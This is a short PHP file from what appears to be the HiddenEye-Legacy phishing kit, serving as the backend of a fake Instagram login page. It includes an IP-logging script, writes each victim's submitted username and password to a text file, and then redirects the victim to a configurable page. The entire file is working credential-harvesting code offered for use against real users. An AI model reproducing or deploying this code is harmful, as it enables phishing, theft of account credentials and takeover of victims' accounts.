HiddenEye-Legacy/WebPages/Instagram_advanced_attack/login.php
2018-12-12 16:00:29 +05:30

7 lines
188 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();